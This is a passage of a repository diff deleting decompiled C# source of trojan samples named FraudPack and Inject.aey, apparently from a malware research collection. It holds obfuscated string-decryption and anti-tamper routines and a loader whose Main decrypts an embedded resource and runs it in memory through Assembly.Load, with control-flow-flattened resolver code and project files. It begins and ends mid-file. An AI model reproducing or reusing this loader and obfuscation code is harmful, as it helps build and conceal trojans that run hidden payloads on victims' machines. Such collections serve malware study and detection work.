if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
\u0008.\u000E = (byte[]) null;
num1 = 1526390421 ^ (int) (uint) \u000E.\u0002() ^ -~-~~--~~-~-360289216;
\u0008.\u000F = num1;
\u0008.\u0006 = \u0008.\u0006 & 268435314 ^ 6788;
}
else
num1 = \u0008.\u000F;
int num2 = _param0 ^ 48212366 ^ num1;
\u0008.\u0003.BaseStream.Position = (long) num2;
byte[] numArray2;
if (\u0008.\u0005 != null)
{
numArray2 = \u0008.\u0005;
}
else
{
short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ -18706 ^ num2);
if (count == (short) 0)
{
numArray2 = (byte[]) null;
}
else
{
numArray2 = \u0008.\u0003.ReadBytes((int) count);
for (int index = 0; index != numArray2.Length; ++index)
numArray2[index] ^= (byte) (\u0008.\u000F >> ((index & 3) << 3));
}
}
int num3 = \u0008.\u0003.ReadInt32() ^ num2 ^ -~-~-~~-~1522195984 ^ num1;
if (num3 == -2)
{
numArray1 = \u0008.\u0003.ReadBytes(4);
_param0 = -1522195983 ^ num1;
}
else
{
bool flag1 = (num3 & int.MinValue) != 0;
bool flag2 = (num3 & 1073741824) != 0;
bool flag3 = (num3 & 536870912) != 0;
int count = num3 & 536870911;
byte[] numArray3 = \u0006.\u0002(numArray2, \u0008.\u0003.ReadBytes(count));
if (\u0008.\u000E != null != (\u0008.\u0006 != 1607814))
{
for (int index = 0; index < count; ++index)
{
byte num4 = \u0008.\u000E[index & 7];
byte num5 = (byte) ((int) num4 << 3 | (int) num4 >> 5);
numArray3[index] = (byte) ((uint) numArray3[index] ^ (uint) num5);
}
}
int num6 = \u0008.\u0006 - 12;
byte[] bytes;
int length;
if (!flag2)
{
bytes = numArray3;
length = count;
}
else
{
length = (int) numArray3[2] | (int) numArray3[0] << 16 | (int) numArray3[3] << 8 | (int) numArray3[1] << 24;
bytes = new byte[length];
\u0008.\u0002(numArray3, 4, bytes);
}
string str2;
if (flag1 && num6 == 1607802)
{
char[] chArray = new char[length];
for (int index = 0; index < length; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
int num7 = num6 + ((int) sbyte.MaxValue + (num6 & 3) << 5);
if (num7 != 1611930)
str2 = (_param0 + count ^ 936568 ^ num7 & 1293).ToString("X");
if (!flag3)
{
str2 = string.Intern(str2);
\u0008.\u0002.Add(_param0, str2);
if (\u0008.\u0002.Count == 51)
{
\u0008.\u0003.Close();
\u0008.\u0003 = (BinaryReader) null;
\u0008.\u0005 = \u0008.\u000E = (byte[]) null;
}
}
return str2;
}
}
return str1;
}
}
private static void \u0002(byte[] _param0, int _param1, byte[] _param2)
{
int num1 = 0;
int num2 = 0;
int num3 = 128;
int length = _param2.Length;
label_10:
while (num1 < length)
{
if ((num3 <<= 1) == 256)
{
num3 = 1;
num2 = (int) _param0[_param1++];
}
if ((num2 & num3) != 0)
{
int num4 = ((int) _param0[_param1] >> 2) + 3;
int num5 = ((int) _param0[_param1] << 8 | (int) _param0[_param1 + 1]) & 1023;
_param1 += 2;
int num6 = num1 - num5;
if (num6 < 0)
break;
while (true)
{
if (--num4 >= 0 && num1 < length)
_param2[num1++] = _param2[num6++];
else
goto label_10;
}
}
else
_param2[num1++] = _param0[_param1++];
}
}
}

200
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_000E.cs
View File

@ -1,200 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u000E
{
private static \u000E.\u0002 \u0002 = new \u000E.\u0002();
[MethodImpl(MethodImplOptions.NoInlining)]
internal static long \u0002()
{
if ((object) Assembly.GetCallingAssembly() != (object) typeof (\u000E).Assembly || !\u000E.\u0002())
return 5038234971328056794;
lock (\u000E.\u0002)
{
long num1 = \u000E.\u0002.\u0002();
if (num1 == 0L)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
List<byte> byteList = new List<byte>();
AssemblyName assemblyName;
try
{
assemblyName = executingAssembly.GetName();
}
catch
{
assemblyName = new AssemblyName(executingAssembly.FullName);
}
byte[] collection = assemblyName.GetPublicKeyToken();
if (collection != null && collection.Length == 0)
collection = (byte[]) null;
if (collection != null)
byteList.AddRange((IEnumerable<byte>) collection);
byteList.AddRange((IEnumerable<byte>) Encoding.Unicode.GetBytes(assemblyName.Name));
int num2 = \u000E.\u0002(typeof (\u000E));
int num3 = \u000E.\u0005.\u0002();
byteList.Add((byte) (num2 >> 24));
byteList.Add((byte) (num3 >> 16));
byteList.Add((byte) (num2 >> 8));
byteList.Add((byte) num3);
byteList.Add((byte) (num2 >> 16));
byteList.Add((byte) (num3 >> 8));
byteList.Add((byte) num2);
byteList.Add((byte) (num3 >> 24));
int count = byteList.Count;
ulong num4 = 0;
for (int index = 0; index != count; ++index)
{
ulong num5 = num4 + (ulong) byteList[index];
ulong num6 = num5 + (num5 << 20);
num4 = num6 ^ num6 >> 12;
byteList[index] = (byte) 0;
}
ulong num7 = num4 + (num4 << 6);
ulong num8 = num7 ^ num7 >> 22;
num1 = (long) (num8 + (num8 << 30)) ^ -6354475306657079513L;
\u000E.\u0002.\u0002(num1);
}
return num1;
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
private static bool \u0002() => \u000E.\u0003();
[MethodImpl(MethodImplOptions.NoInlining)]
private static bool \u0003()
{
StackFrame frame = new StackTrace().GetFrame(3);
MethodBase methodBase = frame == null ? (MethodBase) null : frame.GetMethod();
Type type = (object) methodBase == null ? (Type) null : methodBase.DeclaringType;
return (object) type != (object) typeof (RuntimeMethodHandle) && (object) type != null && (object) type.Assembly == (object) typeof (\u000E).Assembly;
}
private static int \u0002(Type _param0) => _param0.MetadataToken;
private sealed class \u0002
{
private int \u0002;
private int \u0003;
internal \u0002() => this.\u0002(0L);
[MethodImpl(MethodImplOptions.NoInlining)]
internal long \u0002()
{
if ((object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u0002).Assembly || !\u000E.\u0002())
return 2918384;
int[] numArray = new int[4]
{
0,
0,
0,
-~~-~-~-~990503695
};
numArray[1] = -~~--~-~~456139194;
numArray[2] = -~~--~-~~-113420117;
numArray[0] = -~~-~-~-~-~1852801813;
int num1 = this.\u0002;
int num2 = this.\u0003;
int num3 = ~-~--~~-~1640531524;
int num4 = -~~-~--~~-~957401310;
for (int index = 0; index != 32; ++index)
{
num2 -= (num1 << 4 ^ num1 >> 5) + num1 ^ num4 + numArray[num4 >> 11 & 3];
num4 -= num3;
num1 -= (num2 << 4 ^ num2 >> 5) + num2 ^ num4 + numArray[num4 & 3];
}
for (int index = 0; index != 4; ++index)
numArray[index] = 0;
return (long) ((ulong) num2 << 32 | (ulong) (uint) num1);
}
[MethodImpl(MethodImplOptions.NoInlining)]
internal void \u0002(long _param1)
{
if ((object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u0002).Assembly || !\u000E.\u0002())
return;
int[] numArray = new int[4]
{
0,
-~-~-~~-~-~456139193,
0,
0
};
numArray[0] = -~-~~--~~1852801818;
numArray[2] = -~~-~-~--~~-113420120;
numArray[3] = -~~-~-~-~990503695;
int num1 = -~-~~--~~-~1640531527;
int num2 = (int) _param1;
int num3 = (int) (_param1 >> 32);
int num4 = 0;
for (int index = 0; index != 32; ++index)
{
num2 += (num3 << 4 ^ num3 >> 5) + num3 ^ num4 + numArray[num4 & 3];
num4 += num1;
num3 += (num2 << 4 ^ num2 >> 5) + num2 ^ num4 + numArray[num4 >> 11 & 3];
}
for (int index = 0; index != 4; ++index)
numArray[index] = 0;
this.\u0002 = num2;
this.\u0003 = num3;
}
}
private static class \u0003
{
internal static int \u0002(int _param0, int _param1) => _param0 ^ _param1 - ~--~~--~~-~1099352654;
internal static int \u0003(int _param0, int _param1) => _param0 - ~-~-~--~~-~-809594693 ^ _param1 + ~--~~-~-~1210238059;
internal static int \u0005(int _param0, int _param1) => _param0 ^ _param1 - -~-~~--~~1694919635 ^ _param0 - _param1;
}
private sealed class \u0005
{
[MethodImpl(MethodImplOptions.NoInlining)]
internal static int \u0002() => (object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u0005).Assembly || !\u000E.\u0002() ? -1509110933 : \u000E.\u0003.\u0005(\u000E.\u0003.\u0003(\u000E.\u0002(typeof (\u000E.\u0006)), \u000E.\u0003.\u0005(\u000E.\u0002(typeof (\u000E.\u0005)), \u000E.\u0002(typeof (\u000E.\u000F)))), \u000E.\u0002\u2000.\u0002());
}
private sealed class \u0006
{
[MethodImpl(MethodImplOptions.NoInlining)]
internal static int \u0002() => (object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u0006).Assembly || !\u000E.\u0002() ? -82806859 : \u000E.\u0003.\u0002(\u000E.\u0002(typeof (\u000E.\u0008)), \u000E.\u0002(typeof (\u000E.\u000E)) ^ \u000E.\u0003.\u0003(\u000E.\u0002(typeof (\u000E.\u0006)), \u000E.\u0003.\u0005(\u000E.\u0002(typeof (\u000E.\u0002\u2000)), \u000E.\u000E.\u0002())));
}
private sealed class \u0008
{
[MethodImpl(MethodImplOptions.NoInlining)]
internal static int \u0002() => (object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u0008).Assembly || !\u000E.\u0002() ? 1294352278 : \u000E.\u0003.\u0005(\u000E.\u0003.\u0002(\u000E.\u0006.\u0002() ^ -~~--~-~~-527758445, \u000E.\u0002(typeof (\u000E.\u000E))), \u000E.\u0003.\u0003(\u000E.\u0002(typeof (\u000E.\u0005)) ^ \u000E.\u0002(typeof (\u000E.\u0002\u2000)), -~~-~-~--~~-520760563));
}
private sealed class \u000E
{
[MethodImpl(MethodImplOptions.NoInlining)]
internal static int \u0002() => (object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u000E).Assembly || !\u000E.\u0002() ? 402344241 : \u000E.\u0003.\u0005(\u000E.\u0002(typeof (\u000E.\u000E)), \u000E.\u0003.\u0002(\u000E.\u0002(typeof (\u000E.\u0005)), \u000E.\u0003.\u0003(\u000E.\u0002(typeof (\u000E.\u0006)), \u000E.\u0003.\u0005(\u000E.\u0002(typeof (\u000E.\u0008)), \u000E.\u0003.\u0002(\u000E.\u0002(typeof (\u000E.\u000F)), \u000E.\u0002(typeof (\u000E.\u0002\u2000)))))));
}
private sealed class \u000F
{
[MethodImpl(MethodImplOptions.NoInlining)]
internal static int \u0002() => (object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u000F).Assembly || !\u000E.\u0002() ? -56237163 : \u000E.\u0003.\u0003(\u000E.\u0003.\u0003(\u000E.\u0008.\u0002(), \u000E.\u0003.\u0002(\u000E.\u0002(typeof (\u000E.\u000F)), \u000E.\u0006.\u0002())), \u000E.\u0002(typeof (\u000E.\u0002\u2000)));
}
private sealed class \u0002\u2000
{
[MethodImpl(MethodImplOptions.NoInlining)]
internal static int \u0002() => (object) Assembly.GetCallingAssembly() != (object) typeof (\u000E.\u0002\u2000).Assembly || !\u000E.\u0002() ? 1106695601 : \u000E.\u0003.\u0002(\u000E.\u0002(typeof (\u000E.\u0002\u2000)), \u000E.\u0003.\u0005(\u000E.\u0003.\u0003(\u000E.\u0002(typeof (\u000E.\u000F)), \u000E.\u0002(typeof (\u000E.\u0005))), \u000E.\u0003.\u0005(\u000E.\u0002(typeof (\u000E.\u0008)) ^ -~~-~-~-~-~523414304, \u000E.\u000F.\u0002())));
}
}

BIN
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/          ​  
View File

Binary file not shown.

53
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/Trojan.MSIL.Inject.aey.csproj
View File

@ -1,53 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{E533FF14-6877-47A8-A601-2EAD4BE6E46A}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Monkey</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003C.cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="ed404015d077ea06" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/Trojan.MSIL.Inject.aey.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Monkey", "Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.csproj", "{E533FF14-6877-47A8-A601-2EAD4BE6E46A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E533FF14-6877-47A8-A601-2EAD4BE6E46A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{E533FF14-6877-47A8-A601-2EAD4BE6E46A}.Debug|Any CPU.Build.0 = Debug|Any CPU
{E533FF14-6877-47A8-A601-2EAD4BE6E46A}.Release|Any CPU.ActiveCfg = Release|Any CPU
{E533FF14-6877-47A8-A601-2EAD4BE6E46A}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

9
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/_003C.cs
View File

@ -1,9 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
internal sealed class \u003C
{
}

21
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,21 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Reflection;
[StandardModule]
internal sealed class \uE000
{
static \uE000() => \uE008.\uE000();
[STAThread]
public static void Main()
{
Assembly assembly = (Assembly) Assembly.Load(.\uE004).GetType(.\uE002 + .\uE007 + .\uE003).GetMethod(.\uE005).Invoke((object) .\uE006, new object[0]);
}
}

498
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,498 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
using System;
using System.IO;
using System.Reflection;
using System.Threading;
internal sealed class \uE008
{
private static Assembly \uE000;
private static object \uE001 = new object();
private static int \uE002;
private static string[] \uE003;
public static void \uE000()
{
if ((\uE008.\uE002 == 0 ? 0 : 1) != 0)
return;
try
{
Monitor.Enter(\uE008.\uE001);
if ((\uE008.\uE002 == 0 ? 0 : 1) != 0)
return;
label_19:
int num1 = -226195680;
int num2 = -561798657;
label_3:
while (true)
{
num2 ^= 555203725;
label_11:
int num3 = 968784119;
int num4 = -376123481;
label_5:
while (true)
{
num4 ^= 370221929;
label_7:
int num5 = 169643759;
while (true)
{
switch (num5 ^ 170977803)
{
case 2909411:
label_8:
num4 = -376123484;
num5 = 169643758;
continue;
case 2909412:
switch (num4 + 8000308)
{
case 0:
goto label_11;
case 1:
switch (num3)
{
case 1949493:
label_14:
num2 = -561798659;
num3 = 968784118;
goto label_4;
case 1949494:
switch (num2 + 7070352)
{
case 0:
switch (num1 + 5290868)
{
case 0:
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\uE008.\uE001);
num1 = -226195679;
goto label_2;
case 1:
goto label_22;
default:
goto label_18;
}
case 1:
goto label_19;
case 2:
label_2:
num1 ^= 220971948;
goto label_14;
default:
num3 = 968784116;
goto label_4;
}
case 1949495:
goto label_3;
default:
goto label_13;
}
case 2:
label_4:
num3 ^= 967034817;
goto label_8;
default:
num5 = 169643752;
continue;
}
case 2909413:
goto label_5;
default:
goto label_7;
}
}
label_13:
num4 = -376123483;
}
label_18:
num2 = -561798660;
}
label_22:
\uE008.\uE002 = 1;
}
finally
{
Monitor.Exit(\uE008.\uE001);
}
}
public static string \uE000 => "ed404015d077ea06";
public static Assembly \uE001(object _param0, ResolveEventArgs _param1)
{
if ((\uE008.\uE003 == null ? 0 : 1) == 0)
{
try
{
Monitor.Enter(\uE008.\uE001);
if ((\uE008.\uE003 == null ? 0 : 1) == 0)
{
label_15:
int num1 = 1319863694;
int num2 = -1247360233;
label_3:
Stream manifestResourceStream;
while (true)
{
num2 ^= 1242423639;
label_7:
int num3 = 1536961512;
int num4 = -942752411;
while (true)
{
switch ((num4 ^ 946906395) + 4319108)
{
case 0:
goto label_7;
case 1:
switch (num3)
{
case 2222797:
label_10:
num2 = -1247360152;
num3 = 1536961513;
goto label_4;
case 2222798:
switch (num2 + 5559746)
{
case 0:
goto label_15;
case 1:
switch (num1)
{
case 3571212:
manifestResourceStream = typeof (\uE008).Assembly.GetManifestResourceStream(\uE008.\uE000);
num1 = 1319863695;
goto label_2;
case 3571213:
if (manifestResourceStream != null)
{
num1 = 1319863692;
goto label_2;
}
else
goto label_22;
case 3571214:
goto label_21;
default:
goto label_17;
}
case 2:
label_2:
num1 ^= 1318976386;
goto label_10;
default:
label_13:
int num5 = 357788384;
while (true)
{
switch (num5 ^ 357216823)
{
case 1693911:
num3 = 1536961515;
num5 = 357788399;
continue;
case 1693912:
goto label_4;
default:
goto label_13;
}
}
}
case 2222799:
goto label_3;
default:
num4 = -942752409;
continue;
}
case 2:
label_4:
num3 ^= 1539162406;
break;
}
num4 = -942752410;
}
label_17:
num2 = -1247360151;
}
label_21:
int num6 = 0;
goto label_23;
label_22:
num6 = 1;
label_23:
if (num6 == 0)
\uE008.\uE000 = \uE008.\uE002(manifestResourceStream);
}
}
finally
{
Monitor.Exit(\uE008.\uE001);
}
}
return (!\uE008.\uE003(_param1.Name) ? 1 : 0) == 0 ? \uE008.\uE000 : (Assembly) null;
}
private static Assembly \uE002(Stream _param0)
{
MemoryStream input = \uE010.\uE000(_param0);
BinaryReader binaryReader = new BinaryReader((Stream) input);
label_2:
int num1 = -976949257;
int length;
int index;
string[] strArray;
while (true)
{
switch ((num1 ^ 979141528) + 6787986)
{
case 0:
strArray = new string[length];
num1 = -976949272;
continue;
case 1:
length = binaryReader.ReadInt32();
num1 = -976949258;
continue;
case 2:
index = 0;
num1 = -976949271;
continue;
case 3:
if (index != 0)
{
num1 = -976949270;
continue;
}
goto label_9;
case 4:
goto label_8;
default:
goto label_2;
}
}
label_8:
int num2 = 0;
goto label_10;
label_9:
num2 = 1;
label_10:
if (num2 != 0)
goto label_12;
label_11:
strArray[index] = binaryReader.ReadString();
++index;
label_12:
if ((index >= length ? 0 : 1) == 0)
{
\uE008.\uE003 = strArray;
label_25:
int num3 = -143477510;
int num4 = -1430655755;
label_15:
byte[] numArray;
while (true)
{
num4 ^= 1426872453;
label_19:
int num5 = -80790779;
int num6 = -1051659499;
while (true)
{
switch ((num6 ^ 1053901982) + 8276087)
{
case 0:
goto label_19;
case 1:
switch (num5 + 7895701)
{
case 0:
label_22:
num4 = -1430655766;
num5 = -80790780;
goto label_16;
case 1:
switch (num4 + 4869010)
{
case 0:
goto label_25;
case 1:
int count;
switch (num3 + 4299732)
{
case 0:
numArray = new byte[count];
num3 = -143477511;
goto label_14;
case 1:
binaryReader.Read(numArray, 0, count);
num3 = -143477509;
goto label_14;
case 2:
count = (int) (input.Length - input.Position);
num3 = -143477512;
goto label_14;
case 3:
goto label_31;
default:
goto label_27;
}
case 2:
label_14:
num3 ^= 147640532;
goto label_22;
default:
num5 = -80790782;
goto label_16;
}
case 2:
goto label_15;
default:
num6 = -1051659497;
continue;
}
case 2:
label_16:
num5 ^= 78167657;
break;
}
num6 = -1051659500;
}
label_27:
num4 = -1430655765;
}
label_31:
return Assembly.Load(numArray);
}
goto label_11;
}
private static bool \uE003(string _param0)
{
if ((\uE008.\uE003 == null ? 1 : 0) == 0)
{
label_6:
int num1 = 1477415917;
int num2 = 601725783;
int index;
string[] strArray;
while (true)
{
switch (num2 ^ 602759493)
{
case 3209744:
switch (num1)
{
case 3757452:
if (index != 0)
{
num1 = 1477415916;
goto label_1;
}
else
goto label_12;
case 3757453:
index = 0;
num1 = 1477415919;
goto label_1;
case 3757454:
strArray = \uE008.\uE003;
num1 = 1477415918;
goto label_1;
case 3757455:
goto label_11;
default:
num2 = 601725780;
continue;
}
case 3209745:
goto label_6;
case 3209746:
label_1:
num1 ^= 1479984739;
break;
}
num2 = 601725781;
}
label_11:
int num3 = 0;
goto label_13;
label_12:
num3 = 1;
label_13:
if (num3 != 0)
goto label_27;
label_14:
string str = strArray[index];
if ((!_param0.Equals(str) ? 1 : 0) == 0)
{
label_22:
int num4 = -311275153;
int num5 = 878119074;
label_16:
bool flag;
while (true)
{
num5 ^= 880632524;
label_18:
int num6 = -433645422;
while (true)
{
switch ((num6 ^ 431101690) + 7008665)
{
case 0:
label_19:
num5 = 878119073;
num6 = -433645421;
continue;
case 1:
switch (num5)
{
case 2779756:
goto label_22;
case 2779757:
switch (num4 + 4671099)
{
case 0:
flag = true;
num4 = -311275156;
goto label_15;
case 1:
goto label_29;
default:
goto label_24;
}
case 2779758:
label_15:
num4 ^= 315287786;
goto label_19;
default:
num6 = -433645411;
continue;
}
case 2:
goto label_16;
default:
goto label_18;
}
}
label_24:
num5 = 878119072;
}
label_29:
return flag;
}
++index;
label_27:
if ((index >= strArray.Length ? 0 : 1) != 0)
goto label_14;
}
return false;
}
}

46
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
using System.IO;
using System.Reflection;
internal sealed class \uE009
{
public static string \uE000(string _param0, int _param1) => string.Intern(\uE009.\uE000.\uE000.\uE000(_param0, _param1));
public static string \uE000 => "84785c03fc20bf7c";
private sealed class \uE000
{
public static readonly \uE009.\uE000 \uE000;
private byte[] \uE001;
static \uE000()
{
\uE008.\uE000();
\uE009.\uE000.\uE000 = new \uE009.\uE000();
}
private \uE000()
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\uE009.\uE000);
if (manifestResourceStream == null)
return;
this.\uE001 = new byte[256];
manifestResourceStream.Read(this.\uE001, 0, this.\uE001.Length);
}
public string \uE000(string _param1, int _param2)
{
int length = _param1.Length;
int index = _param2 & (int) byte.MaxValue;
char[] charArray = _param1.ToCharArray();
while (--length >= 0)
charArray[length] = (char) ((uint) charArray[length] ^ ((uint) this.\uE001[index] | (uint) _param2));
return string.Intern(new string(charArray));
}
}
}

1058
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

File diff suppressed because it is too large Load Diff

11
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,11 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
internal struct \uE00B
{
public int \uE000;
public int \uE001;
}

13
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,13 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
internal sealed class \uE00C
{
internal bool \uE000;
internal ushort \uE001;
internal \uE00C \uE002;
internal \uE00C \uE003;
}

11
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,11 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
internal sealed class \uE00D
{
internal \uE00C \uE000;
internal \uE00C \uE001;
}

798
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,798 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
